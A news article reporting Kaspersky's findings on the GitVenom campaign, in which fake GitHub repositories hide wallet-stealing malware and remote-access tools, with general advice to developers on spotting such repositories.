Hackers Use GitHub Repositories to Target Crypto Wallets

Cybercriminals are using GitHub to spread malware disguised as useful software. According to reports, Security experts at Kaspersky found a campaign called GitVenom in which hackers created hundreds of fake repositories.

Fake GitHub Repositories are Stealing Crypto Wallets

These repositories claim to grant users access to tools for social media automation, crypto wallet management, and gaming improvements. However, they do not perform as promised. Instead, the code installs hidden scripts that download additional malware and target crypto wallets. The attackers made these repositories look like legitimate open-source projects, tricking developers into using them.

The malicious code appears in Python, JavaScript, C, C++, and C# projects. In Python, attackers hide commands behind long sequences of tab characters. These commands install cryptography tools and decrypt hidden payloads. JavaScript repositories use Base64 encoding to trigger harmful scripts. In C-based projects, the malware hides in Visual Studio files and runs during the build process.

According to Kaspersky’s report, once activated, these scripts steal login credentials, crypto wallet data, and browsing history. The stolen data is then sent to hackers through Telegram. Some repositories include tools such as AsyncRAT and the Quasar backdoor, which give attackers remote access to infected systems. A clipboard hijacker replaces copied crypto wallet addresses with ones controlled by the hackers, ensuring victims unknowingly send funds to them.

Open-Source Risks and How to Stay Safe

Notably, this style of attack is not new. GitVenom has been active for years, with some repositories dating back two years. Kaspersky’s data shows that most attacks have been detected in Russia, Brazil, and Turkey. 

The issue is that open-source platforms, while helpful, can also be dangerous. Attackers manipulate repositories to appear legitimate, tricking developers into trusting them. Kaspersky urges developers to thoroughly examine GitHub repositories before using them.

One primary concern is how attackers use artificial intelligence to make their fake repositories seem real. They generate phony commit histories, detailed README files, and even fabricated reviews. Developers should be cautious of repositories with overly polished descriptions, repetitive phrasing, or signs of artificial intelligence-generated content.

The Challenge of Detecting Fake Repositories

Using artificial intelligence for README files is not inherently suspicious. However, if a repository appears too perfect, further investigation is necessary. Checking for real community engagement, user reviews, and legitimate projects that use the code can help.

 However, attackers also create fake reviews and social media posts, making it even more difficult to detect scams.

The best defense is caution. Developers should analyze repository activity, scan for hidden scripts, and avoid blindly trusting open-source code.

Meanwhile, this development is coming in a pivotal moment in the crypto market where over $1.4B in funds were stolen by the Lazarus group Bybit heist

In related news, Microsoft Threat Intelligence has discovered a new XCSSET malware variant targeting cryptocurrency wallets on Apple macOS devices.